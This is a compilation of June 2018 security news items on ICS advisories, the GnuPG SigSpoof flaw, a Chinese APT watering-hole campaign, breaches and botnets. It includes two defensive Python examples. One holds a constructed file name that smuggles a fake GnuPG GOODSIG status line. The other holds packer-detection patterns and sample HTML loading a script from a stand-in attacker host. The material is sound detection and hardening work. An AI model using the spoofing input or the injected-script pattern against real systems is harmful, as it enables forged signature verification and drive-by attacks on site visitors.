Siemens this week published five new security advisories describing several vulnerabilities discovered in its switches, routers, building automation products, and medical devices.

One of the advisories covers a high severity flaw that allows an unprivileged attacker to execute arbitrary code with elevated privileges by sending a specially crafted DHCP response to an affected device’s DHCP request. The attacker requires access to the local network segment that hosts the targeted device.

The security hole affects SCALANCE X switches, SCALANCE X-204RNA access points, RUGGEDCOM WiMAX private wireless WAN devices, and RFID 181-EIP and SIMATIC RF182C RFID communication modules.

Updates that patch the vulnerability are available for some SCALANCE X switches, while for the other products the vendor has advised customers to apply a series of mitigations that should prevent attacks.

Some SCALANCE X switches are also impacted by two cross-site scripting (XSS) flaws, including one that is persistent. Updates and mitigations are available for both security holes.


Siemens also told customers that SCALANCE M875 industrial routers are impacted by six vulnerabilities. Three of them have been classified as high severity, including two command execution flaws that can be exploited by an authenticated attacker with admin privileges, and a cross-site request forgery (CSRF) bug.

The other flaws, rated “medium” severity, have been described as an arbitrary file download issue, an XSS vulnerability, and insecure storage of administrator passwords. Exploitation of all vulnerabilities requires access to the targeted device’s web interface and in some cases involves convincing the user to click on a link or visit a certain page.

The vulnerabilities have been addressed with the release of SCALANCE M876-4 routers, but users can also protect their devices against attacks by applying mitigations recommended by Siemens.

A separate advisory published this week by the automation giant describes two high severity flaws affecting Healthineers RAPID-Lab 1200 series and RAPIDPoint 400/405/500 Blood Gas Analyzers, medical devices used for blood sample analysis.

The weaknesses include a privilege escalation issue that can be exploited both locally and remotely, and the presence of a default account that allows attackers to access the device on TCP port 5900.

Siemens has also published an advisory for additional building automation products vulnerable to attacks due to the use of a Gemalto license management system (LMS).

The company said there was no evidence that any of these flaws had been exploited in the wild when the advisories were published.


Critical Flaws Patched in Schneider Building Automation Software
15.6.2018 securityweek ICS

Schneider Electric recently patched four vulnerabilities in its U.motion Builder software, including two critical command execution flaws. Advisories have been published by both the vendor and ICS-CERT.

Schneider Electric’s U.motion is a building automation solution used around the world mainly in the energy, critical manufacturing and commercial facilities sectors. U.motion Builder is a tool designed for creating projects for U.motion devices.

A Chinese researcher who uses the online moniker “bigric3” discovered that U.motion Builder is affected by a critical stack-based buffer overflow vulnerability (CVE-2018-7784).

“This exploit occurs when the submitted data of an input string is evaluated as a command by the application,” Schneider said in an advisory. “In this way, the attacker could execute code, read the stack, or cause a segmentation fault in the running application.”

Another critical flaw discovered by bigric3 is CVE-2018-7785, which has been described as a remote command injection issue that can lead to authentication bypass.

Both these security holes have been assigned CVSS scores of 10. They can be exploited remotely even by an attacker with a low skill level.


Bigric3 has also been credited for finding a medium severity cross-site scripting (XSS) vulnerability in the U.motion Builder application.

Another flaw in U.motion Builder was discovered by Wei Gao of Ixia. The researcher found that the “improper validation of input of context parameter in an HTTP GET request” can lead to the disclosure of sensitive information. This issue has also been classified as having medium severity.

Schneider patched these vulnerabilities with the release of version 1.3.4. All prior versions are impacted.

In addition to the patch, ICS-CERT and the U.S. National Cybersecurity & Communications Integration Center (NCCIC) have provided a series of general recommendations for minimizing the risk of attacks.


Experts released a free decryptor for Everbe Ransomware
15.6.2018 securityaffairs
Ransomware   

Researchers have released a decryptor tool that could be used by victims of the Everbe Ransomware to decrypt their files for free.
Good news for the victims of the Everbe Ransomware: the popular malware researchers Michael Gillespie and Maxime Meignan have released a decryptor that victims can use to decrypt their files for free.

The Everbe Ransomware encrypts files and appends the .[everbe@airmail.cc].everbe, .embrace, or .pain extension to the encrypted file’s name.

In order to decrypt the files, victims need an unencrypted version of one of the encrypted files; the pair is then used to brute force the decryption key.

When the malware infects a machine, it drops a ransom note in each folder containing encrypted files. The note, titled !=How_recovery_files=!.txt, contains the instructions to start the payment process: victims must send an email to everbe@airmail.cc for payment instructions.

Now victims can use the InsaneCrypt Decryptor to restore their files: they have to select the menu item “Settings” and choose “Bruteforcer”.

In order to decrypt the files, it is necessary to provide the tool both encrypted and unencrypted versions of the files.


Once the brute-force process is completed, the decryptor will have found the decryption key, which it then uses to restore the files.

When the decryption process has finished, the decryptor will display a summary of the total amount of files that have been decrypted.

“Though your files are now decrypted, the original encrypted files will still be on your computer. Once you confirm that your files have been properly decrypted, you can use CryptoSearch to move all the encrypted files into one folder so you can delete or archive them.” explained Lawrence Abrams from BleepingComputer.com.


2018 Russia World Cup : Russian cyber spy may hack travelers’ mobile devices
15.6.2018 securityaffairs  CyberSpy  

According to a top US intelligence official, mobile phones of football fans traveling to Russia for the World Cup could be hacked by the Russian Intelligence.
Russia World Cup 2018 – Mobile devices and computers of football fans traveling to Russia could be hacked by Russian intelligence, according to an alert issued by William Evanina, Director of the National Counterintelligence and Security Center.

The top US official warned of massive surveillance operated by Russian authorities during the World Cup for security reasons.

“Anyone traveling to Russia to attend the World Cup should be clear-eyed about the cyber risks involved,” Evanina said in a statement.

“If you’re planning on taking a mobile phone, laptop, PDA, or other electronic device with you — make no mistake — any data on those devices (especially your personally identifiable information) may be accessed by the Russian government or cyber criminals.”


Every traveler attending the event in Russia may be a target of Russian intelligence; to prevent nation-state hackers from compromising their devices, the official suggests removing the battery when the device is not in use.

“Corporate and government officials are most at risk, but don’t assume you’re too insignificant to be targeted.”


Analyzing the SAP June 2018 Security Patch Day
15.6.2018 securityaffairs
Vulnerebility   

SAP June 2018 Security Patch Day addresses two security notes; the company also fixed five issues in previously released notes, including two critical flaws rated Hot News.
The most common flaw types are Cross-Site Scripting and Remote Command Execution, followed by implementation flaws and information disclosure.

“It seems that the downward trend in the number of monthly notes is continuing. This month, a total of 14 security notes has been released, with only seven notes published today. Seven notes in total (50%) are tagged as High Priority or Hot News.” reads the post published by Onapsis.

The two Hot News Security Notes received CVSS scores of 9.8 and 9.1, respectively; they affect SAP Business Client (version 6.5) and SAP BASIS (versions 7.31, 7.40, 7.50, 7.51, 7.65, 7.66).

The first update is related to a Security Note released on the April 2018 Patch Day and addresses third-party web browser controls delivered with SAP Business Client; the second is an update to a Note released on the November 2016 Patch Day that addresses an OS command injection vulnerability in the Report for Terminology Export component.

SAP June 2018 Security Patch Day also addresses four High severity vulnerabilities and four Medium risk flaws.

“On 12th of June 2018, SAP Security Patch Day saw the release of 5 Security Notes. Additionally, there were 5 updates to previously released security notes.” states SAP’s advisory.

The most severe high-risk flaw is an information disclosure vulnerability, tracked as CVE-2018-2425, that affects SAP Business One. The flaw resides in the Business One version for SAP HANA, specifically in its backup service, and could be exploited by an attacker to access restricted information.

“[CVE-2018-2425] Information Disclosure in SAP Business One for SAP HANA Backup Service (#2588475): Business One is SAP’s more lightweight ERP system designed for small to medium-sized businesses. The vulnerability discussed in the note exists in the Business One version for SAP HANA, more specifically in its backup service.” continues the analysis published by Onapsis.

“The note does not contain many details, but mentions the vulnerability allows an attacker to access information which would otherwise be restricted. It does seem the sensitive information exists in the backup service logs. The fix implies updating your Business One component software.”

The SAP June 2018 Security Patch Day also addresses a remote command execution flaw tracked as CVE-2015-0899 that affects SAP Internet Sales, and a DoS issue tracked as CVE-2014-0050 that also affects SAP Internet Sales.

SAP also addressed the CVE-2018-2408 flaw described as an improper session management bug in SAP Business Objects.


SigSpoof GnuPG flaw could be exploited to spoof message signatures
15.6.2018 securityaffairs  Safety  

GnuPG 2.2.8 released earlier this month addresses the CVE-2018-12020 vulnerability, dubbed SigSpoof, affecting GnuPG, Enigmail, GPGTools, and python-gnupg.
GnuPG, also known as GPG, is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows users to encrypt and sign data and communications.

“The signature verification routine in Enigmail 2.0.6.1, GPGTools 2018.2, and python-gnupg 0.4.2 parse the output of GnuPG 2.2.6 with a ‘--status-fd 2’ option, which allows remote attackers to spoof arbitrary signatures via the embedded ‘filename’ parameter in OpenPGP literal data packets, if the user has the verbose option set in their gpg.conf file,” reads the blog post published by Marcus Brinkmann, who discovered the SigSpoof flaw.

The expert noted that even though the verbose option is disabled by default, it is included in several recommended configurations for GnuPG.

Status messages are parsed by applications that get information from GPG about the validity of a signature.

“Status messages are created with the option “--status-fd N,” where N is a file descriptor. If N is 2, status messages and regular diagnostic messages share the stderr output channel.” explains GnuPG maintainer Werner Koch.

“The issue resides in the OpenPGP protocol allowing the inclusion of the file name of the original input file into a signed or encrypted message. The GnuPG tool can display a notice with that file name during decryption and verification, but it does not sanitize the file name, meaning that an attacker could include line feeds or other control characters in it.”

Because GnuPG does not sanitize the file name, an attacker can embed line feeds or other control characters in it.

In this way an attacker can inject terminal control sequences and create fake status messages, and can also fake the verification status of a signed email.

“The attacker can inject arbitrary (fake) GnuPG status messages into the application parser to spoof signature verification and message decryption results. The attacker can control the key ids, algorithm specifiers, creation times and user ids, and does not need any of the private or public keys involved.” continues Brinkmann.

Brinkmann noted that OpenPGP limits the file name stored in an encrypted file to 255 bytes.

Brinkmann published a proof of concept showing how to spoof signatures in both Enigmail and GPGTools, and a separate PoC showing how both the signature and the encryption status can be spoofed in Enigmail. The expert also demonstrated how to spoof a signature on the command line.

While disabled by default, verbose is included in several recommended configurations for GnuPG, and it is one of the main causes for this vulnerability.

To mitigate the issue, the researcher suggests not including the verbose option in gpg.conf and avoiding gpg --verbose on the command line. Developers have to add the --no-verbose option to all calls of gpg.

Assessing the risks for critical infrastructure, the expert explained that the potential effects of this issue are severe.
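The two points above (status messages sharing stderr when N is 2, and the --no-verbose mitigation) are shown below in an added example that is not from Brinkmann, GnuPG or any of the affected projects. The gpg output strings are constructed for the demo, the key id and user id are placeholders, and the helper names are my own. The naive parser stands for the pattern the affected applications used; the hardened builder routes status output to a dedicated descriptor and forces verbosity off so diagnostics are never parsed.

```python
"""Added example: strict GnuPG status parsing and a hardened gpg invocation.

Real gpg options used: --batch, --no-verbose, --status-fd, --verify, --verbose, -v.
Sample output strings are constructed for this demo and are not real gpg output.
"""
from typing import Dict, List, Optional, Sequence

STATUS_PREFIX = "[GNUPG:] "


def parse_status_records(status_output: str) -> List[List[str]]:
    """Split a status-fd stream into [keyword, arg, ...] lists.

    Only lines that start with the exact status prefix are kept. This is
    only trustworthy when status_output came from a descriptor that GnuPG
    diagnostic messages never write to (i.e. not fd 2).
    """
    records: List[List[str]] = []
    for line in status_output.splitlines():
        if line.startswith(STATUS_PREFIX):
            fields = line[len(STATUS_PREFIX):].split()
            if fields:
                records.append(fields)
    return records


def signature_verdict(records: List[List[str]]) -> Optional[str]:
    """Return the key id of the first GOODSIG record, or None if there is none."""
    for fields in records:
        if fields[0] == "GOODSIG" and len(fields) >= 2:
            return fields[1]
    return None


def naive_verdict_from_shared_stderr(stderr_text: str) -> Optional[str]:
    """The pattern SigSpoof abused: the application ran gpg with --status-fd 2,
    so diagnostics and status lines arrive interleaved on stderr, and it then
    scans that mixed stream for status lines. A verbose diagnostic that echoes
    an attacker-chosen file name containing a line feed produces a line the
    scanner cannot distinguish from genuine status output."""
    return signature_verdict(parse_status_records(stderr_text))


def hardened_verify_command(signed_file: str, status_fd: int = 3,
                            extra_args: Sequence[str] = ()) -> List[str]:
    """Build gpg argv with status output on its own descriptor (never 2) and
    --no-verbose last-wins over any verbose setting from gpg.conf.
    The caller is expected to open `status_fd` as a pipe and parse only that."""
    if status_fd == 2:
        raise ValueError("status fd must not share stderr with diagnostics")
    if any(arg in ("--verbose", "-v") for arg in extra_args):
        raise ValueError("verbose output must not be enabled when status is parsed")
    return ["gpg", "--batch", "--no-verbose", "--status-fd", str(status_fd),
            *extra_args, "--verify", signed_file]


# Constructed sample (not real gpg output): a verbose "original file name"
# notice where the embedded file name carries a line feed followed by text
# shaped like a status line. Key id and user id are placeholders.
CONSTRUCTED_SHARED_STDERR = (
    "gpg: original file name='report.txt\n"
    "[GNUPG:] GOODSIG 0123456789ABCDEF Placeholder <placeholder@example.invalid>'\n"
    "gpg: no valid OpenPGP data found.\n"
)

# Constructed sample of what a dedicated status descriptor would carry for
# the same unsigned input: no GOODSIG, so nothing to spoof.
CONSTRUCTED_DEDICATED_STATUS = "[GNUPG:] NODATA 1\n"


def demo() -> Dict[str, Optional[str]]:
    """Contrast the spoofable shared-stderr scan with the dedicated-fd parse."""
    return {
        "shared_stderr": naive_verdict_from_shared_stderr(CONSTRUCTED_SHARED_STDERR),
        "dedicated_fd": signature_verdict(parse_status_records(CONSTRUCTED_DEDICATED_STATUS)),
    }


if __name__ == "__main__":
    print(demo())
    print(" ".join(hardened_verify_command("message.txt.asc")))
```

In a real integration the process is started with the extra descriptor open (for example with `pass_fds` in `subprocess.Popen`) and only that descriptor is handed to `parse_status_records`; stderr is logged but never parsed.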

“The vulnerability in GnuPG goes deep and has the potential to affect a large part of our core infrastructure. GnuPG is not only used for email security, but also to secure backups, software updates in distributions, and source code in version control systems like Git,” Brinkmann concludes.


European Parliament Votes to Ban Kaspersky Products
14.6.2018 securityweek BigBrothers  

Kaspersky Suspends Collaboration With Europol and NoMoreRansom

Kaspersky Lab has suspended its collaboration with Europol and the NoMoreRansom initiative after the European Parliament passed a resolution that describes the company’s software as being “malicious.”

Kaspersky is not trusted by some governments due to its alleged ties to Russian intelligence, which has sparked concerns that the company may be spying for Moscow.

The call for a ban on Kaspersky’s products in the European Union is part of a report on cyber defense written by Estonian MEP Urmas Paet of the Committee on Foreign Affairs.

The next-to-last proposal in the report “Calls on the EU to perform a comprehensive review of software, IT and communications equipment and infrastructure used in the institutions in order to exclude potentially dangerous programmes and devices, and to ban the ones that have been confirmed as malicious, such as Kaspersky Lab.”

The resolution was approved with 476 votes in favor and 151 against. In response, Kaspersky Lab’s founder and CEO, Eugene Kaspersky, said his company would be freezing collaboration with Europol and the NoMoreRansom project, and highlighted that the EU’s decision “welcomes cybercrime in Europe.”

Kaspersky is one of the private sector companies that founded NoMoreRansom, and it has helped Europol in several major cybercrime investigations, including a $1 billion cyber-heist.

“[It is] frustrating that there was no investigation, no evidence of any wrongdoing from our side, just references to false allegations from anonymous sources. This is the essence of media-ocracy: fake news → political decisions,” Eugene Kaspersky said on Twitter. “The risks of using our software are purely hypothetical. Just as hypothetical as with any other cybersecurity software of any country. But the risk of becoming a victim of a genuine cyberattack is real – and extremely high. Ergo: EP's political decision plays *for* cybercrime.”

Interestingly, an answer given in April by the European Commissioner for Digital Economy and Society, Mariya Gabriel, in response to a question from Polish politician Anna Fotyga regarding the risks associated with the use of Kaspersky software states that “the Commission has no indication for any danger associated with this anti-virus engine.”

On the other hand, Paet says he stands by his report. “These decisions must be taken seriously, they have not been taken out of the blue but instead have been drawn from various partners and intelligence sources. Considering the overall situation of EU-Russia relations, and Russia’s aggressive behaviour, we should not be taking risks that could cause serious damage to the EU,” he told EURACTIV after the vote.

The report is not legally binding, but it could influence some EU member states, especially since the U.K., the Netherlands and Lithuania have already moved to ban the use of Kaspersky software on sensitive systems. Kaspersky took legal action in the United States in an effort to overturn a decision to prohibit the use of its products by government agencies, but a judge rejected the lawsuit.

Many in the cybersecurity industry are skeptical of the accusations against Kaspersky, especially since no evidence of wrongdoing has been provided and many decisions related to the company appear to be based on media reports.

The security firm has been trying to clear its reputation, first by launching a transparency initiative that included giving partners access to source code, and more recently by announcing a move of core processes from Russia to Switzerland.


5.9 Million Card Details Accessed in Dixons Carphone Hack
14.6.2018 securityweek  Incident 

Dixons Carphone, a household name in the UK, announced (PDF) today that it is investigating "unauthorised access to certain data held by the company." It describes this access as "an attempt to compromise 5.9 million cards in one of the processing systems of Currys PC World and Dixons Travel stores," and "1.2m records containing non-financial personal data, such as name, address or email address..."

This may turn out to be the biggest ever breach in the UK.

Right now, nothing has been disclosed on how the breach was effected, nor who might be the culprit. There are reports, however, that the incursion started almost a year ago in July 2017. With no technical details available, interest is focusing on why it took so long to discover the breach; how the company is handling the disclosure and notification; and whether the data protection regulator will consider the breach under the UK Data Protection Act 1998, or the EU's General Data Protection Regulation (GDPR) that came into effect on May 25.

The ICO's own statement gives nothing away. A spokesperson said, "It is early in the investigation. We will look at when the incident happened and when it was discovered as part of our work and this will inform whether it is dealt with under the 1998 or 2018 Data Protection Acts." For the latter, read 'GDPR' until the UK's Brexit takes effect.

The ambiguity arises because the breach occurred – or at least commenced – in pre-GDPR times. What we don't know is when Dixons Carphone discovered the breach. Since May 25 it will (probably) have been subject to the very strict GDPR breach notification rules.

If the whole incident is considered under GDPR rules, the ICO could potentially fine Dixons Carphone up to 4% of its annual global revenue. Last year the group reported total sales of £10.5 billion ($14 billion). A fine under GDPR could be many hundreds of millions of pounds. Under the Data Protection Act 1998, the maximum fine would be just £500,000 ($670,000).

Technical concerns focus on why it took so long for Dixons Carphone to discover the breach. Robert Wassall, data protection lawyer and head of legal services at ThinkMarble, comments, "The fact that this breach has only just been identified through a routine security review can be viewed from two sides. Yes, it's great that this breach was identified as it proves that the review process and scanning for vulnerabilities works. On the other hand, the breach began in July 2017, why wasn't it identified sooner? How often is security scanning done, given that it has taken almost a year to be found?"

Ross Brewer, VP and MD EMEA at LogRhythm, is less accommodating. "The scale and time-frame of this data breach is staggering," he says. "Initial attempts to access data began in July last year, yet this was only discovered over the past week, indicating that the company lacks vital threat detection capabilities."

The breach notification concerns center around the Dixons Carphone statement. Some commenters praise the apparent speed and fullness of its notification to victims. Ilia Kolochenko, CEO and founder of web security company High-Tech Bridge, says, "With over a billion of compromised records last year, I think this particular incident is of small importance. Many similar breaches occur every day and alas remain unnoticed. Unless we have evidence of malicious exploitation of the allegedly stolen data, no major detriment is imputable upon the victims. In light of these facts, Dixons Carphone's decision to disclose - is rather laudable, albeit one may question the timeline of the disclosure. Many other companies are much less courageous to tell the truth, as even in light of GDPR enforcement, the new law cannot monitor proper disclosure of inconspicuous data breaches."

Others, however, fear that the statement attempts to minimize actual harm over and above warning the victims about potential future harm. Dixons Carphone chief executive, Alex Baldock, said, "we have currently no evidence of fraud as a result of these incidents." The statement also implies that victims needn't worry about their card details, since by far the majority are chip and PIN cards, and no CVVs were included. It does not mention the potential for phishing and other social engineering scams targeted against actual or just potential Dixons Carphone breach victims.

Trevor Resche, threat intelligence officer at Trusted Knight, is forthright. "Today's breach of Dixons data will have far reaching consequences for some time. While Dixons has said that there is no evidence of fraud taking place, now the data is in the criminal sphere, it's unlikely to be long before it starts being shopped around amongst criminals, with ensuing phishing and bruteforce attacks launched."

For the moment, we don't know enough about the breach. Dixons Carphone is now working with law enforcement (NCSC), with the financial regulator (FCA), the data protection regulator (ICO), and "leading cyber security experts." While victims will need to monitor their bank accounts closely and be suspicious of all incoming Dixons Carphone-related emails; businesses in general and the cybersecurity industry in particular will be monitoring the reaction of the data protection regulator. If the ICO finds that Dixons Carphone was negligent in its protection of customer data, it could levy a significant fine.


Apple Steps Up Encryption to Thwart Police Cracking of iPhones
14.6.2018 securityweek Apple  

Apple said Wednesday it was strengthening encryption on its iPhones to thwart police efforts to unlock handsets without legitimate authorization.

The move by Apple, the latest in an ongoing clash with law enforcement, comes amid reports of growing use of a tool known as GrayKey which can enable police to bypass iPhone security features.

Apple said the new features are not designed to frustrate law enforcement but prevent any bypassing of encryption by good or bad actors.

"At Apple, we put the customer at the center of everything we design," the company said in a statement.

"We're constantly strengthening the security protections in every Apple product to help customers defend against hackers, identity thieves and intrusions into their personal data. We have the greatest respect for law enforcement, and we don't design our security improvements to frustrate their efforts to do their jobs."

Apple said it was working on a fix to mitigate the possibility of accessing data with GrayKey or similar tools.

Apple said that it has a team that responds to law enforcement and national security requests 24 hours a day. But the company has been a target of some in law enforcement for rejecting efforts to allow easy access to iPhones.

Two years ago, Apple went to court to block an FBI effort to force it to weaken iPhone encryption on the device of a mass shooter in San Bernardino, California, but officials dropped the case after finding a tool to unlock the phone.


World Cup: US Spy Warns Russians Will Hack Phones, Computers
14.6.2018 securityweek   Hacking

A top US intelligence official warned football fans traveling to Russia for the World Cup that their phones and computers could be hacked by Moscow's cyber spies.

William Evanina, Director of the National Counterintelligence and Security Center, said that in Russia, even people who believe they are too unimportant to be hacked can be targeted.

"Anyone traveling to Russia to attend the World Cup should be clear-eyed about the cyber risks involved," Evanina said in a statement.

"If you're planning on taking a mobile phone, laptop, PDA, or other electronic device with you -- make no mistake -- any data on those devices (especially your personally identifiable information) may be accessed by the Russian government or cyber criminals."

Evanina, in charge of the agency that assesses and counters the threat to the United States from foreign espionage, said that people attending the World Cup, which begins on Thursday, should leave behind any devices they can do without.

For devices they take with them, they should remove the battery when it is not in use, he said.

"Corporate and government officials are most at risk, but don’t assume you're too insignificant to be targeted."


China-linked Emissary Panda APT group targets National Data Center in Asia
14.6.2018 securityaffairs  APT

A China-linked APT group, tracked as LuckyMouse, Emissary Panda, APT27 and Threat Group 3390, has targeted a national data center in Central Asia.
The APT group has been active since at least 2010; the crew has targeted U.S. defense contractors and financial services firms worldwide.

In March 2018, security experts at Kaspersky Lab observed an attack powered by the Chinese APT group; the experts speculate that the campaign started in the fall of 2017.

The attack hit a national data center in an unnamed country in Central Asia. According to Kaspersky, the hackers were preparing a watering hole attack: they attempted to inject malicious JavaScript code into the government websites connected to the data center.

“In March 2018 we detected an ongoing campaign targeting a national data center in the Central Asia that we believe has been active since autumn 2017. The choice of target made this campaign especially significant – it meant the attackers gained access to a wide range of government resources at one fell swoop.” reads the blog post published by Kaspersky.

“We believe this access was abused, for example, by inserting malicious scripts in the country’s official websites in order to conduct watering hole attacks.”

The attackers compromised the government website to deliver either the Browser Exploitation Framework (BeEF) or the ScanBox reconnaissance framework. At the time of the report, experts were not able to determine the way the hackers breached the government website.

“The websites were compromised to redirect visitors to instances of both ScanBox and BEeF. These redirects were implemented by adding two malicious scripts obfuscated by a tool similar to the Dean Edwards packer.” continues the post.
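The redirect technique Kaspersky describes (two injected scripts, obfuscated with a packer resembling Dean Edwards' /packer/, that send visitors to an external framework) lends itself to a simple page audit. The following is an added example written for this article, not Kaspersky's tooling; the HTML sample, the host names and the allowlist are constructed, and the regular expression assumes the well-known `eval(function(p,a,c,k,e,...)` header of /packer/ output, which the page only says the attackers' tool resembled.

```python
"""Added example: audit a fetched HTML page for injected script tags.

Flags (1) inline scripts whose body starts with the eval(function(p,a,c,k,e,..))
header characteristic of Dean Edwards' /packer/, and (2) <script src=...> tags
that load from hosts outside an allowlist. Sample HTML and hosts are constructed.
"""
import re
from typing import Dict, Iterable, List
from urllib.parse import urlparse

# Header emitted by /packer/: eval(function(p,a,c,k,e,d){ ... }) or ...e,r){ ... })
PACKER_SIGNATURE = re.compile(
    r"eval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*[a-z]\s*\)",
    re.IGNORECASE,
)
SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def audit_scripts(html: str, trusted_hosts: Iterable[str]) -> List[Dict[str, str]]:
    """Return one finding per suspicious script tag in document order."""
    trusted = {h.lower() for h in trusted_hosts}
    findings: List[Dict[str, str]] = []
    for index, match in enumerate(SCRIPT_TAG.finditer(html)):
        attrs, body = match.group(1), match.group(2)
        src = SRC_ATTR.search(attrs)
        if src:
            host = (urlparse(src.group(1)).hostname or "").lower()
            # Protocol-relative or absolute URLs carry a host; relative paths do not.
            if host and host not in trusted:
                findings.append({"script": str(index), "reason": "external-src", "detail": host})
        if PACKER_SIGNATURE.search(body):
            findings.append({"script": str(index), "reason": "packer-obfuscated",
                             "detail": body.strip()[:40]})
    return findings


# Constructed sample page: one benign inline script, one script from the site's
# own CDN, one externally sourced script, and one packed inline script.
CONSTRUCTED_HTML = """
<html><head>
<script>var pageLoaded = true;</script>
<script src="https://static.gov-portal.example/app.js"></script>
<script src="//hook.attacker-cdn.invalid/scan.js"></script>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return c};return p}('0 1',2,2,'x|y'.split('|'),0,{}))
</script>
</head><body>content</body></html>
"""

TRUSTED_HOSTS = ["static.gov-portal.example"]  # constructed allowlist


def demo() -> List[Dict[str, str]]:
    return audit_scripts(CONSTRUCTED_HTML, TRUSTED_HOSTS)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The allowlist approach is deliberately strict: a watering hole only needs one script tag that the site owner did not add, so any unknown host is worth a look, and an obfuscation header that the site's own build pipeline never produces is a stronger signal still.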

One of the hypotheses formulated by Kaspersky sees the hackers using weaponized Office documents to trigger the CVE-2017-11882 vulnerability, the same issue exploited by other APT groups like the Cobalt hacking group.

The campaign monitored by Kaspersky leveraged a RAT tracked as HyperBro, code previously associated with other Chinese-speaking threat actors.

The timestamps for these modules are from December 2017 until January 2018.

The main command and control (C&C) server used in this campaign is bbs.sonypsps[.]com, which is hosted on an IP address associated with a Ukrainian ISP. The IP address belongs to a MikroTik router running firmware version 6.34.4, released in March 2016; the device, which has SMBv1 enabled, may have been hacked by the Emissary Panda hackers.

“The TTPs for this campaign are quite common for Chinese-speaking actors,” concludes Kaspersky.

“The most unusual and interesting point here is the target. A national data center is a valuable source of data that can also be abused to compromise official websites. Another interesting point is the Mikrotik router, which we believe was hacked specifically for the campaign. The reasons for this are not very clear: typically, Chinese-speaking actors don’t bother disguising their campaigns. Maybe these are the first steps in a new stealthier approach.”

Further details, including the IoCs are reported in the analysis published by Kaspersky.


Researcher found 43 Million email addresses leaked by the Trik spam botnet
14.6.2018 securityaffairs  BotNet

A security researcher from Vertek Corporation reported to Bleeping Computer that over 43 million email addresses have been leaked from the command and control server of a spam botnet.
An expert from Vertek Corporation spotted the C&C server while investigating a recent malware campaign distributing a version of the Trik trojan. The malicious code was used as first-stage malware that dropped the GandCrab v3 ransomware.

Malware experts from the Proofpoint firm have recently begun tracking the Phorpiex/Trik botnet that was used by sophisticated threat actors to distribute a range of malware.

“It is not especially sophisticated or complex but has been active for almost a decade, flying under the radar and attracting a solid customer base of threat actors.” reads the analysis published by Proofpoint.

“As we began tracking this botnet more closely, we discovered that a number of familiar actors were repeatedly leveraging Trik’s power and distribution capabilities for delivery of their malware.”

Both malware samples downloaded their files from a misconfigured server located on a Russian IP address.

The content of the server was accessible to anyone. The researcher discovered 2201 text files, labeled sequentially from 1.txt to 2201.txt, each containing chunks of roughly 20,000 email addresses.

“The Vertek researcher believes the operators of this server have been using these recipient lists to service other crooks who contracted their services to distribute various malware strains via malspam campaigns.” reported Bleeping Computer.

“We pulled all of them to validate that they are unique and legitimate,” the researcher told Bleeping Computer earlier today. “Out of 44,020,000 potential addresses, 43,555,741 are unique.”

The researcher shared the findings with the popular cyber security expert Troy Hunt, who runs the Have I Been Pwned service, to determine the origin of the data.

The huge trove of email addresses comes from everywhere: the expert counted 4.6 million unique email domains (e.g. .gov, .com and the domains of several private businesses).

The vast majority of the email addresses belong to older services, such as Yahoo (10.6 million) and AOL (8.3 million).

“Surprisingly, while there are many custom email domains included in the leak, there are very few Gmail addresses included, suggesting the email addresses database is either incomplete, or this malware campaign intentionally targeted users using older email services.” continues Bleeping Computer.

The Trik C&C server discovered by the expert goes offline intermittently.

Below are the top 10 email domains included in the leaked data:

8907436 yahoo.com
8397080 aol.com
788641 comcast.net
433419 yahoo.co.in
432129 sbcglobal.net
414912 msn.com
316128 rediffmail.com
294427 yahoo.co.uk
286835 yahoo.fr
282279 verizon.net


June 12 2018 Historic Edition of Cyber Defense eMagazine Has Arrived. Over 150 pages…
14.6.2018 securityaffairs  Cyber

June 12, 2018 – Cyber Defense eMagazine has arrived – OVER SIX THOUSAND PAGES – SIX YEARS – #1 GLOBAL SOURCE FOR CYBER DEFENSE
Cyber Defense eMagazine
June 2018 Edition has arrived.

We hope you enjoy this month’s edition…packed with over 150 pages of excellent content. InfoSec Knowledge is Power. We have 6 years of eMagazines online with timeless content. Visit our online library by clicking here. Please tell your friends to

subscribe – no strings, always free emagazines:

FLIPBOOK

http://www.cyberdefensemagazine.com/newsletters/june-2018/index.html

PDF

http://www.cyberdefensemagazine.com/newsletters/june-2018/CDM-CYBER-DEFENSE-eMAGAZINE-June-2018.pdf

MOBILE

http://www.cyberdefensemagazine.com/newsletters/june-2018/mobile/index.html

Our InfoSec awards are given out annually at the RSA Conference in the United States in Q1. USA 2018 Awards – CLOSED.

Congratulations to our InfoSec Awards 2018 Winners!

WANT TO SEE THE 200 INNOVATORS THAT MADE THE CUT THIS YEAR?

CLICK THIS LINK, HERE.

Our Global Awards are given out annually at the IPEXPO Conference, a global event in Europe, in Q4. GLOBAL 2018 Awards – OPEN. Click here to apply.

MAGAZINES TV AWARDS and more platforms under development…

Sincerely,

TEAM CDM

Cyber Defense Magazine

P.S. Thanks to our awesome sponsors – media kits available here.

We are all things Cyber Defense. Thank you to our amazing readership!



Exploit Kits Target Recent Flash, Internet Explorer Zero-Days
13.6.2018 securityweek Exploit

Exploit kits (EKs) might not be as dominant as they were several years ago, but they continue to exist, and most of them have already adopted exploits for recently discovered Flash and Internet Explorer zero-day vulnerabilities.

The first of the flaws is CVE-2018-4878, a security bug in Adobe’s Flash Player discovered in late January, when it was exploited by a North Korean hacker group in attacks aimed at individuals in South Korea. Adobe released a patch within a week after the bug became public, but it continued to be targeted in numerous other attacks.

The second is CVE-2018-8174, a critical issue that allows attackers to remotely execute arbitrary code on all supported versions of Windows, and which was addressed with the May 2018 Patch Tuesday updates. The bug is an update to a 2-year-old VBScript vulnerability (CVE-2016-0189) that continues to be abused in attacks.

The recently patched Flash Player zero-day tracked as CVE-2018-5002, which has been exploited in targeted attacks, has yet to be added to EKs.

“Since both Flash and the VBScript engine are pieces of software that can be leveraged for web-based attacks, it was only natural to see their integration into exploit kits,” Malwarebytes points out.

Within days after a proof of concept became publicly available, RIG adopted the exploit for the new VBScript engine flaw, becoming the first EK to do so. The toolkit also added an exploit for said Flash bug, and was observed pushing payloads such as Bunitu, Ursnif, and the SmokeLoader backdoor.

